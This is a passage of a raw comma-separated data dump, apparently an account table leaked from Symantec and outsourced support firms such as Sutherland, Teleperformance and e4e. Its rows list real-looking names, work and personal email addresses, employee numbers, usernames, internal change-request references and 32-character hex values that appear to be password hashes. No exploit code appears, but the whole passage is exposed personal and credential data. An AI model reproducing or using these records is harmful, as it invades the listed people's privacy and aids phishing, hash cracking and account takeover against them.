1E-41CD-9680-6ABA4AB1774D,NULL,NULL,aortona@sercom.com.br,Sercom,400934e1f049d22
66bbc495959e0fa55,Ortona,NULL,Allan_Ortona,Allan,NULL,NULL,NULL
3C-4BEC-AC9A-F35B273359CE,<blank>,<blank>,allen.wang@clts.cn,CLTS,8eeb2cb33b60a0
7494d8ec8d8f6f4094,Wang,<blank>,Allen_Wang,Allen,NULL,NULL,NULL
77-4A08-9416-76CA8FC789A0,<blank>,<blank>,Amaro.araujo@nl.fujitsu.com,Symantec,3
615f5c498b4bda41f970527ec2ee8f1,Araujo,<blank>,Amaro_Araujo,Amaro,NULL,NULL,NULL
42ec-447d-baf9-6eec6a95f190,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,17921fdadd2f5c2d78b7532cb8b57fe7,Ghodi,<blank>,089001,Devesh,NULL,NULL,NULL
D-494F-AC58-78015C59C522,<blank>,<blank>,gian_schoeman@symantec.com,Symantec,5e5
32f3838670b47f0ac01917176aa81,Schoeman,<blank>,Gian_Schoeman,Gian,NULL,NULL,NULL
F-4F86-909A-A223FD3C5809,<blank>,022713,tomas_heinz@symantec.com,Symantec,b96ea4
fc75ab5b65e41da67efa429265,Heinz,<blank>,Tomas_Heinz,Tomas,NULL,NULL,NULL
7290-4c55-9fa7-5a750b7e7fa4,WS 16-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,5da994d390bc5216caeb781d4c56f56f,Relleta,<blank>,076100,Cheryll,NULL,NULL
,NULL
b307-4419-a01e-b88160c73c1b,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,9c66e27124ab6aa44f53d99a2a80b890,Kumar,<blank>,kvpraveen_kumar_cc,K.V.Pra
veen ,NULL,NULL,NULL
6e7d-4894-86c4-ed0fb78a19f1,CRQ000000223554-KD-21-03-2011,000-000,tools_id@syman
tec.suth.com,Sutherland,b296c2c52f2efb35b87ee06e7fd1c2c6,Patel,<blank>,114088,Ra
hul,NULL,NULL,NULL
4-4E06-AB58-B2D4815DB9F7,<blank>,<blank>,raffaella_torelli@symantec.com,Symantec
,06c3b708f11180ac8597120118836346,Torelli,<blank>,Raffaella_Torelli,Raffaella,NU
LL,NULL,NULL
fa9e-487e-82f9-0d6b5ffb93f9,sms 15.11.10,<blank>,tools_id@symantec.suth.com,suth
erland,3ab8a541ef05cc8ce1d797d333c65666,Karthick,<blank>,99600,SR,NULL,NULL,NULL
F-4745-A830-EE0E3D3E57CF,NULL,NULL,Cecile_Pinot@symantec.com,Symantec,554ef9cf52
187fdca8af757c7df3343b,Pinot,NULL,Cecile_Pinot,Cecile,NULL,NULL,NULL
d355-48a5-9cb0-93965d5f7d0f,CRQ000000596061--vmd--21/03/2012,000-000,ricardo_bel
izario@Suth.com,Sutherland,d7d33161251343cfd2115c32bb9e8f27,Belizario,<blank>,22
2513,Ricardo,NULL,NULL,NULL
F-4302-98EB-EC86AC96C558,<blank>,062000,Marcus_Becker@symantec.com,Symantec,d82c
a14f8e52ca1f4a9f361918ba42aa,Becker,<blank>,Marcus_Becker,Marcus,NULL,NULL,NULL
E-4E38-9BDA-C0C25B0E9666,<blank>,<blank>,heidi_duchting@symantec.com,Symantec,85
1f90cabf6a5e8d0b3126862a7de571,Duchting,<blank>,Heidi_Duchting,Heidi,NULL,NULL,N
ULL
1-4B09-ABF1-ED0F0B8C562E,<blank>,<blank>,espen_lindseth@symantec.com,Symantec,e6
f9c8c0e55bd456588c495f4b602985,Lindseth,<blank>,Espen_Lindseth,Espen,NULL,NULL,N
ULL
D-4C22-B872-B98F9D2913BC,<blank>,<blank>,grainne_twohig@symantec.com,Symantec,15
b58ce668de9f26995e8d8d408b5ac4,Twohig,<blank>,Gr\xe1inne_Twohig,Gr\xe1inne,NULL,
NULL,NULL
A-4173-94CA-20EDFD724EEB,NULL,NULL,emilie_degrange@symantec.com,Symantec,8a65aaf
436831102778b04c5a1a41f08,Degrange,NULL,Emilie_Degrange,Emilie,NULL,NULL,NULL
bd63-49fd-84e3-ac3f83f82d2f,"CRQ000000677557 CLNP May 30,2012",000-000-0000,tool
s_id@symantec.suth.com,Sutherland,84f32eae25966fbe00ccaa33ed9a4ec0,Rane,<blank>,
225977,Parag,NULL,NULL,NULL
1-4B5C-98EE-F03602A7EB8F,<blank>,<blank>,eizo_motai@symantec.com,Symantec,6bf1af
c2ef9f8049528a11ea1a625dba,motai,<blank>,eizo_motai,eizo,NULL,NULL,NULL
0aa2-419e-b347-cd8155851b9e,<blank>,<blank>,sven_cultiaux@teleperformance.com,CT
- 24/07/2012 - CRQ000000741931,8b11cdccd3951240b728c2473f716d32,Cultiaux,<blank
>,228293,Sven,NULL,NULL,NULL
5-4FBD-9566-2D1466912C11,NULL,NULL,tomotaka_maruta@jp-supp.symantec.com,Symantec
,831e6f17fcf7891ff878d38bd67872e4,maruta,NULL,tomotaka_maruta,tomotaka,NULL,NULL
,NULL
58ea-476e-aef2-58e9ebc85593,CRQ000000596064--vmd--21/02/2012,000-000,marth_belle
za@Suth.com,Sutherland,735c6d170c1acf5c35cbf8e6b081aa26,Belleza,<blank>,222515,M
arth,NULL,NULL,NULL
8-4D6D-AB78-B06DD0329EAE,NULL,NULL,yasuhiko_kohno@symantec.com,Symantec,d0c0c194
501bf0d720f0216228b858b1,kohno,NULL,yasuhiko_kohno,yasuhiko,NULL,NULL,NULL
4-4A6B-98C6-D1079818268F,<blank>,<blank>,toshiyuki_kurahayashi@symantec.com,Syma
ntec,f44a6c48591b659e1a833d4159b5c5ec,kurahayashi,<blank>,toshiyuki_kurahayashi,
toshiyuki,NULL,NULL,NULL
C-445E-8648-31F94212CC11,<blank>,<blank>,shingo_yamagami@symantec.com,Symantec,3
efa34c179b11859d80a88d958c0f97c,yamagami,<blank>,shingo_yamagami,shingo,NULL,NUL
L,NULL
8-4FC6-ACCA-5E01FB7FE040,<blank>,<blank>,yuiko_kato@symantec.com,Symantec,130df9
4054f6bc1597024d5c2280761d,kato,<blank>,yuiko_kato,yuiko,NULL,NULL,NULL
B-41E9-BF4A-5CA446E36F87,<blank>,<blank>,kenji_murakami@symantec.com,Symantec,a0
5d91c157582c007ed32a7f63314515,murakami,<blank>,kenji_murakami,kenji,NULL,NULL,N
ULL
7d79-469d-a450-679fc59180fb,"CRQ000000681078 CLNP Jun 01,2012",999-999-9999,tool
s_id@symantec.suth.com,Sutherland,1a603eb7228cfbba42ce95be3e431d97,M,<blank>,226
212,Valarmathi,NULL,NULL,NULL
0ec-448a-9466-431527ed5391,<blank>,2614953,Tools_id@symantec.suth.com,Symantec,5
50b7a56b1e1a0967e7d7a54e7da1d5b,Abellar,<blank>,ivy_abellar,Ivy,NULL,NULL,NULL
c1b4-4274-823d-9d4fd1c05668,CRQ000000272456--VMD--07/06/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,8971c20bb86a5d1e2c9d0567642cd455,Abonita,<blank>,1168
92,Alice Flores,NULL,NULL,NULL
4-4979-98CA-9D4696569524,<blank>,<blank>,qinrongjing_1115@163.com,CLTS,69f4d5d82
17d8aed4f99b7fc1e8e722b,qin,<blank>,rongjing_qin,rongjing,NULL,NULL,NULL
5-4A5A-BA15-E1BC236FADB6,NULL,NULL,abbey4321@gmail.com,CLTS,9a71d5e3ce71e229bfe9
0b0ed9a2e0d3,zhang,NULL,lu_zhang,lu,NULL,NULL,NULL
1b63-414a-9ce4-daf6e5cbaa24,<blank>,<blank>,kasimfaiyaz_shaikh@symantec.com,CT -
04/06/2012 - CRQ000000682533,8acf4e7785956d2094b9ee6472eeb194,Shaikh,<blank>,11
9305,Kasim Faiyaz,NULL,NULL,NULL
D-48A0-9A85-C53A61DFC06B,NULL,NULL,lihongxia523@yahoo.com.cn,CLTS,0769f9b1da842e
889170d1848767f310,liu,NULL,bixia_liu,bixia,NULL,NULL,NULL
B-4A21-9069-2C05649C44F9,NULL,NULL,lihongxia523@yahoo.com.cn,CLTS,7f44da36708dd6
f988ce6270266758a9,li,NULL,hongxia_li,hongxia,NULL,NULL,NULL
543-4a30-bfb2-366b72628754,<blank>,2614953,Tools_id@symantec.suth.com,Symantec,9
ca3f8138209c3e4be3df8fd9e1b9502,Malaki,<blank>,rodel_malaki,Rodel,NULL,NULL,NULL
b769-4725-a53e-9160901e8719,<blank>,<blank>,akafatou@symantec.teleperformance.gr
,PM - 10/25/2011 - CRQ000000372082,28f6e1e4d048edb1b0b73a547231f004,Kafatou,<bla
nk>,121317,Andrea,NULL,NULL,NULL
0b0d-4b93-aba7-b1b908d60856,<blank>,<blank>,pascal.dewilde@teleperformance.nl,CR
Q000000856153 - PR - 25th Oct 2012,c803accb7b7ddabbfae9bf0ab0a99a28,de Wilde,<bl
ank>,231165,Pascal,NULL,NULL,NULL
01e-44e1-b233-7f780164c47a,<blank>,89285,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",03f8e32bb46bf163479f3ac2d448bc04,Kishorev,<blank>,anil_ki
shorev,Anil,NULL,NULL,NULL
1793-48c0-b5ee-a6349ffffc39,<blank>,<blank>,raghu_raman@symantec.com,PM - 10/13/
2011 - CRQ000000357679,b72162e23b5b591ec564ffb266241a85,Raman,<blank>,074041,Rag
hu S,NULL,NULL,NULL
885f-489d-ad4d-3bd89d1b1a21,<blank>,<blank>,accounts@symantec.teleperformance.gr
,CKS-10/13/2010,277c820cefd764ba639970a824cf26b0,Toniolo,<blank>,106242,Alessadr
o,NULL,NULL,NULL
9fa7-412d-ab7e-4ced3c75b26b,PM - 12/5/2011,<blank>,oscar_suarez@teleperformance.
com,<blank>,d258a6ff34ab5f6666fe7e2d79243f38,Suarez,<blank>,080104,Jonathan Osca
r,NULL,NULL,NULL
38bb-462b-8056-b9f30b67dc4c,WS 19-07-2010,INC213497,tools_id@symantec.suth.com,<
blank>,5c622921429cbba5c76356b639c47276,James,<blank>,074417,William F.,NULL,NUL
L,NULL
8df8-491e-90e8-790ad0b0bfdb,"REQ000001577423 CLNP Sept 17,2012",000-0000,lloyd_l
edesma@symantec.com,Symantec,2c78dce70c19c35a8d48434326ff67f5,Ledesma,<blank>,23
0032,Lloyd,NULL,NULL,NULL
b602-45ae-958f-c0f739138576,<blank>,<blank>,accounts@symantec.teleperformance.gr
,CKS-10/13/2010,f3160bb321a765f33def45aa35b52c48,Dede,<blank>,106807,Georgia,NUL
L,NULL,NULL
15dd-4cb4-822c-b75ed00097d8,<blank>,<blank>,carsten.vos@teleperformance.nl,RM-21
March 2012-CRQ000000600522 ,8c41ee7dc3d72a2d2675706aacf03b35,Vos,<blank>,222688
,Carsten,NULL,NULL,NULL
92f5-46fa-a297-ae32be82f183,CRQ000000600800--vmd--22/03/2012,000-000,ronaldo_abl
aza@Suth.com,Sutherland,e950b26bead61eda69753f06b1f2ab24,Ablaza,<blank>,222591,R
onaldo,NULL,NULL,NULL
0fec-405b-bcd4-cd60f396c854,"CRQ000000602079 CLNP Mar22,2012",999-999-9999,tools
_id@symantec.suth.com,Sutherland,708786630f09a42538bc85bd59bd46eb,Abonalla,<blan
k>,222546,Glenn,NULL,NULL,NULL
cee-4382-a800-6e50991ef430,<blank>,090319,Symantec_TL@teleperformance.se,Symante
c,37e0f0b7059b8ad4d6df1b8809bebcc4,Oksanen,<blank>,timo_oksanen,Timo,NULL,NULL,N
ULL
f2-4d60-a2d7-d39dc1ed7af4,<blank>,<blank>,flora_iacoponi@symantec.com,Symantec,2
f0cda74d51c14f83ea149b0f555331d,Iacoponi,<blank>,flora_iacoponi,Flora,NULL,NULL,
NULL
7c-4f41-8cbd-741b0ffceb7c,<blank>,<blank>,rosh_ravindran@symantec.com,Symantec,b
2dbc233ba86e45670c935244a4d306c,Ravindran,<blank>,rosh_ravindran,Rosh,NULL,NULL,
NULL
26-46e6-a68a-76d07c1e0f57,<blank>,<blank>,sagar.patil@e4e.com,e4e,15f23a25f1cd79
4ac7c5f4d116e1f4cc,Patil,<blank>,sagar_patil,Sagar,NULL,NULL,NULL
15-4280-83d0-c8b713c0e07d,<blank>,<blank>,richard_cave@symantec.com,Symantec,409
8960f7ba8ea311f0c8f5e9ef47892,Cave,<blank>,richard_cave,Richard,NULL,NULL,NULL
68-4dbd-b0d1-c890eef8b3ea,<blank>,<blank>,angel_hernandezmontiel@symantec.com,Sy
mantec,13bd12cde00b291a6ae8751288f0445a,Montiel,<blank>,angel_montiel,Angel,NULL
,NULL,NULL
06-4c6e-a978-146953889f6d,<blank>,<blank>,richard_young1@symantec.com,Symantec,d
39cb3b6d256b8aae0ad9d6199935c72,Young,<blank>,richard_young,Richard,NULL,NULL,NU
LL
88-414a-9cb7-9613550f57cb,<blank>,<blank>,julia_green@symantec.com,Symantec,3737
10635f762085880ea8a7f9b88928,Green,<blank>,julia_green,Julia,NULL,NULL,NULL
21-439e-b72d-1764fe97a931,<blank>,<blank>,santhosh.r@symantec.ts.e4e.com,e4e,91d
88e4abe054e1ccaf1f4653649f734,Ramachandra,<blank>,Santhosh_Ramachandra,Santhosh,
NULL,NULL,NULL
ef-40fd-8578-3625a36a8e2b,<blank>,<blank>,hozefa.s@symantec.ts.e4e.com,e4e,d586c
fc82e17dac01e9fbc25a29b19c0,S,<blank>,Hozefa_S,Hozefa,NULL,NULL,NULL
f8-41fa-8288-57486a6e09c9,<blank>,<blank>,thomasina_bates@symantec.com,Symantec,
6e9893756d8363b68e54514d11fb3265,Bates,<blank>,tomi_bates,Thomasina,NULL,NULL,NU
LL
3d2a-450a-9c0f-9fb251872cc0,CRQ000000434764- CLNP 02 Dec 2011,000-0000,tools_id@
symantec.suth.com,Sutherland,5778088f4da0b893d5e85cf51ea3c29e,Kusuma,<blank>,122
726,Sweta,NULL,NULL,NULL
19ec-4e89-8971-005efac04a9b,<blank>,<blank>,Aman_Jain@symantec.com,CT - 26/07/20
12 - CRQ000000745631,1ab709011426adbbfbd67034385f6d91,Jain,<blank>,113681,Aman,N
ULL,NULL,NULL
0ddb-44fd-baf3-3c45af055d31,SPJ-041209,EMPROV,symantec_2nd_maa@tp-tec.nl,Teleper
formance,08af7853070a65861bd81958ec15e770,Jeurissen,<blank>,097347,Bart,NULL,NUL
L,NULL
725b-4e47-9a6b-0af71a4b3f30,CRQ000000413842--VMD--21/11/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,caac71a06af42874f085bff063598159,Joy,<blank>,122514,J
esmon,NULL,NULL,NULL
83d-4ba1-90e4-00ec0c699dcc,<blank>,<blank>,raffaella_torelli@symantec.com,TPG,44
c232dd7f1a53af6399962f7b95737b,Torelli,<blank>,Raffi_Test,Raffi,NULL,NULL,NULL
a655-46ee-94b5-95e25bdd0b6e,CRQ000000603553--vmd--23/03/2012,000-000,joemhar_ant
onio@Suth.com,Sutherland,97ed86b68fc5c7bbb72cfbaf57bd6e9e,Antonio,<blank>,222651
,Joemhar,NULL,NULL,NULL
32f2-4427-834e-0a5800ebbcb0,sms 29,EMPROV/INC185710,Tools_Id@Symantec.Suth.Com,S
utherland,c2d0ddb78337225c9be074b2086735ea,Sahoo,<blank>,099149,DritiKrishna,NUL
L,NULL,NULL
2682-4f97-8e7a-c77889c95551,CRQ000000603575--vmd--23/03/2012,<blank>,jessalyn_do
ria@Suth.com,Sutherland,3d23b281ce6c2edc8e527203c94bf20a,Doria,<blank>,222662,Je
ssalyn,NULL,NULL,NULL
ea1a-4d6f-a419-bb9259750a80,CRQ000000603583--vmd--23/03/2012,<blank>,marhodora_e
scasio@Suth.com,Sutherland,540caa4f4cc02496c86aaa0ea5201cad,Escasio,<blank>,2226
64,MaRhodora,NULL,NULL,NULL
f0e9-430c-94a0-af542ac09ee6,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,70484d80d6819a6ba8a7329d9e98a1ba,Allen,<blank>,085708,Sheila,NULL,NULL,NULL
b0c1-4552-8da9-d82b956d3393,INC213497,nam 07/16/2010,tools_id@symantec.suth.com,
Sutherland,2654699381e8b38a6c588942253603e6,Patwardhan,<blank>,075797,Ameya,NULL
,NULL,NULL
a354-41fa-920e-320bffa373ab,IT_Volume_Access_Request_20110405_NortonLive062,<bla
nk>,kyler_joseph1@symantec.com,CRQ000000247143 - PR - 4/28/2011,2fb2f7a97a3199e1
0c18dbe29da08b0b,Joseph,<blank>,114706,Kyle R ,NULL,NULL,NULL
0aef-4fde-8bd9-02ead578334b,CRQ000000753760--VMD--1/08/2012,<blank>,jgunnarsson@
symantec.teleperformance.gr,Teleperformance,e15923adc6f7e93cdd15ed196a75dd28,Gun
narsson,<blank>,228612,Jon,NULL,NULL,NULL
83de-4e41-8b36-052e6a8f55cf,CRQ000000272459--VMD--07/06/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,eb5c1514f2d66c2f517d9299139c4451,Julius Baculi,<blank
>,116893,Ray-An,NULL,NULL,NULL
6a11-4594-92ff-9590816697c4,<blank>,<blank>,jkralikova@symantec.teleperformance.
gr,CRQ000000808080 - PR - 18th sept 2012,6c8f1f50d60c992fcb5f6cc4a763884e,Kralik
ova,<blank>,230247,Jana,NULL,NULL,NULL
f2d7-4bc3-9459-39b0331e58c8,<blank>,<blank>,serve.hitz@teleperformance.nl,PM - 8
/16/2012 - CRQ000000770686,ff77d5507464b4478a801f644ee3c51e,Hitz,<blank>,229119,
Serve,NULL,NULL,NULL
c8f3-4117-841a-86d4660651c2,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
606973 - PR - 27th March 2012,e3d9b57facfaf1901e1f093af971aa5a,Nair,<blank>,2231
05,Abhishek,NULL,NULL,NULL
c37d-430e-b7d1-2f9f677a508e,WS 27-08-2010,INC000000251655,Tools_ID@Symantec.Suth
.Com,Sutherland,b1b6b4f9f145717e236570797b804444,Sukumaran,<blank>,103096,Bijesh
,NULL,NULL,NULL
1865-4286-a57a-28e578ff4499,<blank>,<blank>,fredrik_ljunggren@teleperformance.co
m,CT - 08/06/2012 - CRQ000000687730,f2f64caac4bb5190f3463a982c2df901,Ljunggren,<
blank>,226428,Fredrik,NULL,NULL,NULL
a9f4-4e0c-88f0-c8c33ff8991e,<blank>,<blank>,stanley_lawrans@symantec.com,CRQ0000
00692515 - PR - 12th June 2012,1d5d1449175d4e71a7b147803fa3ae7e,Lallaban,<blank>
,226635,Marianne \t,NULL,NULL,NULL
f55f-42f5-a885-97e3762e26e8,08/01/2007 - SPJ,EMPROV,Tools_Id@Symantec.Suth.com,S
utherland,d6eb8064e8f0813ac464c52f4519d3c3,TCabahug,<blank>,098306,Gloria,NULL,N
ULL,NULL
44a5-4af1-a17a-24c550bcc485,<blank>,<blank>,glecy_alvero@SPI.COM,PM - 6/14/2012
- CRQ000000694426,331e70be2aeb796da736414a22fdbb64,Alvero,<blank>,226634,Glecy,N
ULL,NULL,NULL
f526-4d15-9354-2b3d21356b2c,"CRQ000000671547 CLNP May 24,2012",000-0000,Godwin_R
@symantec.com,Symantec,8d9e62452c1213dcc1b048dc61bc419a,R,<blank>,224396,Godwin,
NULL,NULL,NULL
3944-4ce8-bd4b-0d6a15e55676,SRB 24.08.2010,INC000000249136,Tools_ID@Symantec.Sut
h.Com,Sutherland,b2a2b7045dfb26f5e3681230b365b989,Roy,<blank>,105236,Suman,NULL,
NULL,NULL
b0a3-42a3-b817-745138aa0947,CRQ000000601604--vmd--22/03/2012,000-000,chinie_avan
cea@suth.com,Sutherland,7a951298eceb0ef907954c481b8c8fe4,Avance??a,<blank>,22260
0,Chinie,NULL,NULL,NULL
07d9-4c64-9097-4d8457a2dedf,<blank>,<blank>,siddarth_vasanth@symantec.com,CRQ000
000388208 - PR - 3rd Nov 2011,fe026fcaac5dad43a17274bbc8ebbc5e,V,<blank>,122164,
Siddarth ,NULL,NULL,NULL
b396-427a-bef4-3e4e8e52fa0c,"RM-CRQ000000390390-Nov 4, 2011",<blank>,Jason_Fenle
y@symantec.com,<blank>,d292e1eebc232f56fd95dd94aa23a37e,Fenley,<blank>,053285,Ja
son,NULL,NULL,NULL
2383-42d9-a06a-62dc0eae75ea,CRQ000000400234-CLNP-10/11/2011,000-0000,mark.koning
s@teleperformance.nl,Teleperformance,3175fb3e27752e6ccd8b73e133ca0ff7,Konings,<b
lank>,089832,Mark,NULL,NULL,NULL
ca5f-449b-98c0-ffcd8bd68bc0,CRQ000000247889,<blank>,tools_id@symantec.suth.com,k
sc-04/28/2011,108cc48e7c70488a8eb6e510f2897326,Gallendez,<blank>,115588,Celeste,
NULL,NULL,NULL
52ff-46f2-8a18-77c2e8f0bfac,nam-08-12-2010,CRQ000000107068,nh.symantec@teleperfo
rmance.com.ar,Teleperformance Argentina,2ac34d2c230f478827a8d33581a99a67,Tavares
Dalbert,<blank>,107945,Fabiana,NULL,NULL,NULL
395b-4b5a-b5f8-a0515423fca5,<blank>,EMPROV,tools_id@symantec.suth.com,Sutherland
,d8d4dd363e0034a5f8760e222e394777,Gill,<blank>,083129,Aaron,NULL,NULL,NULL
7f62-4ee2-ad6b-e97dcb3ff0e2,SSS 17/12/09,EMPROV ,tools_id@symantec.suth.com,Suth
erland,a41663ce104d100f81a13ad9fb35c049,Madhukar,<blank>,gvenkata_madhukar_cc,GV
enkata ,NULL,NULL,NULL
1cca-489b-bd97-e4d13cca7c08,REQ000001145584--VMD--06/12/2011,000-000,tools_id@sy
mantec.suth.com,Sutherland,0cac52b317daedf927bfdafa6ef103a2,Pe Benito,<blank>,12
2778,Luz Clemente,NULL,NULL,NULL
69a-4841-94b3-c258c5ca4e0e,<blank>,86347,Tools_id@symantec.suth.com,"Sutherland
Global Services, Inc.",4ab13ce47dc411d5ef915e45c7e3e226,Jadhav,<blank>,santosh_j
adhav,Santosh,NULL,NULL,NULL
2d68-42c0-a916-7c88c1b7e1a5,CRQ000000601607--vmd--22/03/2012,000-000,jankarl_ban
aag@Suth.com,Sutherland,17d4ff30d3831d1f6f3b23af57262d83,Banaag,<blank>,222602,J
an Karl,NULL,NULL,NULL
46d6-4a8b-a0cc-9876cd488b3d,CRQ000000247898,<blank>,tools_id@symantec.suth.com,K
SC-04/28/2011,4c43fb4c84fe8efd885f6470cf305c8c,Pueyo,<blank>,115589,Ronald,NULL,
NULL,NULL
0c9f-43b7-80e7-3e083aaab1f2,<blank>,<blank>,Stanley_Lawrans@symantec.com,PM - 8/
16/2012 - CRQ000000770360,9450beb32cca38a55bb54f5e1c24b2ec,Lawrans,<blank>,06906
7,Stanley,NULL,NULL,NULL
2a84-46e2-80d8-37381fbf74d8,<blank>,<blank>,Ryan_Rancudo@SPI.COM,PM - 6/14/2012
- CRQ000000694591,1a2493aec5d1d2b5ff4ab44396aa7ebe,Rancudo,<blank>,226738,Ryan,N
ULL,NULL,NULL
b79d-4a92-8ce7-7033ae32f603,CRQ000000709695--vmd--26/06/2012,<blank>,vanessa_mel
ocotones@suth.com,sutherland,d98455b215b77cb504589f2c3397361c,Melocotones,<blank
>,226481,Vanessa,NULL,NULL,NULL
b759-4a7c-957c-7bd9c8a2bc16,08/06/2010 - SPJ,EMPROV,symaccount@neusoft.com,Neuso
ft,01742e3fd93d8a5845dc92bad1a68442,Jin,<blank>,105863,Chunmei,NULL,NULL,NULL
2fd5-4f6f-b216-53ff43aac138,CRQ000000253509 PBP 06/05/2011,<blank>,accounts@syma
ntec.teleperformance.gr,Teleperformance,7df2b24cbb08959c6aa0e35abca88f06,Kaseris
,<blank>,115894,Athanasios,NULL,NULL,NULL
81e-40cf-ad05-10ae43885c88,<blank>,EMPROV,accounts@symantec.teleperformance.gr,T
eleperformance Greece,d21a600fcfa2eb46624cf6436bc61558,Allaoui,<blank>,092594,Mi
na,NULL,NULL,NULL
8f06-4bd4-8221-583a59475ddc,CRQ000000601622--vmd--22/03/2012,000-000,kathrineann
e_calayan@Suth.com,Sutherland,6c0ca1de96f19f194066210ce7821f96,Calayan,<blank>,2
22608,Kathrine Anne,NULL,NULL,NULL
cbc3-4b0a-8499-848a1eb77db0,INC213497,nam 07/16/2010,tools_id@symantec.suth.com,
Sutherland,d59648fd13876bb51166a14b0fc99a70,Arunachalam,<blank>,075743,Raghavan,
NULL,NULL,NULL
c613-4874-a533-ec202d78044b,CRQ000000709695--vmd--26/06/2012,<blank>,brigieluz_f
lorencio@suth.com,sutherland,986f3f810d0cd3d41a0d7fe7bfc24b11,Florencio,<blank>,
226434,Brigieluz,NULL,NULL,NULL
e1f0-44a8-858a-57fc67ee7483,CRQ000000709695--vmd--26/06/2012,<blank>,shienamarie
_esteron@suth.com,sutherland,55ec084b21c0a4c7d36cc7999edeed46,Esteron,<blank>,22
6475,Shiena Marie,NULL,NULL,NULL
a212-4e4b-834d-29b000925b8d,CRQ000000601631---vmd--22/03/2012,000-000,ianchester
_dava@Suth.com,Sutherland,d37688c3bf360370922142a447140909,Dava,<blank>,222609,I
an Chester,NULL,NULL,NULL
ee8e-4535-966b-b1d56bb11efd,<blank>,<blank>,tools_id@symantec.suth.com,CRQ000000
716099,e0b4ed1a2773320358a8d6f5386b6456,Cabusas,<blank>,227432,Jenelyn,NULL,NULL
,NULL
da-4d80-8eba-f47edfacd2b1,<blank>,<blank>,sam_wood@symantec.com,Symantec,82eb459
094cb1c38c5d348117072be8d,Wood,<blank>,sam_wood,Sam,NULL,NULL,NULL
14ee-4dc1-b1a7-542803fd81cd,<blank>,<blank>,tools_id@symantec.suth.com,Sutherlan
d,9877f831e7b9f7f5bc462f2edf04e6f5,RaoG,<blank>,091735,SaiKameshwara,NULL,NULL,N
ULL
56-431e-8c47-779c7c806ed1,<blank>,<blank>,arun_pannikote@symantec.com,Symantec,8
05607bb863d19f2625e183ed1bf4d87,Pannikote,<blank>,arun_pannikote,Arun,NULL,NULL,
NULL
2d-44c7-9a99-df7813ff97a1,<blank>,<blank>,madhu_r@symantec.com,Symantec,d28df2ba
760d663a9f4006bf515b59e9,R,<blank>,madhu_r,Madhu,NULL,NULL,NULL
cc1-4a53-8994-8127d5d6b7f5,<blank>,<blank>,VishwaDeepak_Tiwari@symantec.com,Syma
ntec,e38b6cd25e5eb0a9861d77f466954946,Tiwari,<blank>,vishwadeepak_tiwari,VishwaD
eepak,NULL,NULL,NULL
66-4579-9aaa-3cb76bf0f107,<blank>,<blank>,sanjan_mahanta@symantec.com,Symantec,1
40a3364dc128bd83a9f06141d67a99c,Mahanta,<blank>,sanjan_mahanta,Sanjan,NULL,NULL,
NULL
b5-4450-b395-cccf8c4c5908,<blank>,<blank>,sharath_raju@symantec.com,Symantec,245
b9ba6dd18339ab8fadce2a63a6bd2,Raju,<blank>,sharath_raju,Sharath,NULL,NULL,NULL
91-427f-9539-e8a54b51ed78,<blank>,<blank>,prasad_byrashetty@symantec.com,Symante
c,657f4cc9dbb5363f43df283d10d927dc,Byrashetty,<blank>,prasad_byrashetty,Prasad,N
ULL,NULL,NULL
4783-4864-93c6-c30d486e0425,sms 15.11.10,<blank>,tools_id@symantec.suth.com,suth
erland,99ec3dbf3470c401ce101c260e40dd2c,Subramani,<blank>,086624,Duraivelu,NULL,
NULL,NULL
d0-483b-911c-379efcaacf1a,<blank>,<blank>,jinlee@symantec.com,Symantec,bb6e3a5e7
1743004487d685bb897f78e,Lee,<blank>,jinsoo_lee,Jin Soo,NULL,NULL,NULL
0f-4377-a56f-3f509f9ce262,<blank>,<blank>,udhaya.shankar@e4e.com,e4e,7b751a56196
75ca6095e723f53baed90,Shankar,<blank>,udhaya_shankar,Udhaya,NULL,NULL,NULL
31-411c-a667-1ca09928fcf2,<blank>,<blank>,bnugent@symantec.com,Symantec,156a48f7
69d3c08c2f264f295d80063e,nugent,<blank>,brandon_nugent,brandon,NULL,NULL,NULL
e5-47bd-b2dd-eb4730e1bc6a,<blank>,<blank>,julia_schinharl@symantec.com,Symantec,
02a102d112e25c24f7ddb4b9b4ef66da,Schinharl,<blank>,julia_schinharl,Julia,NULL,NU
LL,NULL
a7-4108-bbbb-3b7a93cc1466,<blank>,<blank>,nathalie_moyano@symantec.com,Symantec,
636d92f99099bf18b76ba6744dc8a71b,Moyano,<blank>,nathalie_moyano,Nathalie,NULL,NU
LL,NULL
43-4d58-a502-e8c33c5f3ed4,<blank>,<blank>,emily_lai@symantec.com,Symantec,f634d3
3edc441b34773e9eb471df6e06,Lai,<blank>,emily_lai,Emily,NULL,NULL,NULL
ca-4093-a693-541b8c49b5a0,<blank>,<blank>,matt_phillips@symantec.com,Symantec,0a
83f082d2926d8f7f8aa06fb4b72b73,Phillips,<blank>,matt_phillips,Matt,NULL,NULL,NUL
L
6b-4e30-8e3c-6cf38c530c74,<blank>,<blank>,sheik.dawood@symantec.ts.e4e.com,e4e,c
bcc1984a8d88a5ac3c68e3d6a98653a,Dawood,<blank>,Sheik_Dawood,Sheik,NULL,NULL,NULL
90-409d-bf56-0d6d3ee287a1,<blank>,<blank>,ramanan.arunachalam@symantects.chnts.,
e4e,55d217f18e1c7f278a7eafffe6ffb331,Arunachalam,<blank>,Ramanan_Arunachalam,Ram
anan,NULL,NULL,NULL
22e3-4b0a-b4d6-3b5cd6e1943a,CRQ000000608520--vmd--28/03/2012,<blank>,angie_umuto
ni@symantec.com,Teleperformance,4a3d9988b9c3143bb1c3b9aad1ceb21e,Umutoni,<blank>
,069667,Angie,NULL,NULL,NULL
71-43fb-a815-605457e3b847,<blank>,<blank>,sriram.sundar@symantects.chnts.e4e.co,
e4e,2a34105947631e5cb37de001d09829ba,Sundar,<blank>,Sathish_Sundar,Sathish,NULL,
NULL,NULL
b6-44b1-826c-6af3a218fa06,<blank>,<blank>,vicent.raj@symantects.chnts.e4e.com,e4
e,3a0c322a7a439f0b68751568839222f2,Savariar,<blank>,Vicent_Raj_Savariar,Vicent R
aj,NULL,NULL,NULL
7b-40b8-aea0-315c4425bc0a,<blank>,<blank>,chandru.selvaraj@symantects.chnts.e4e,
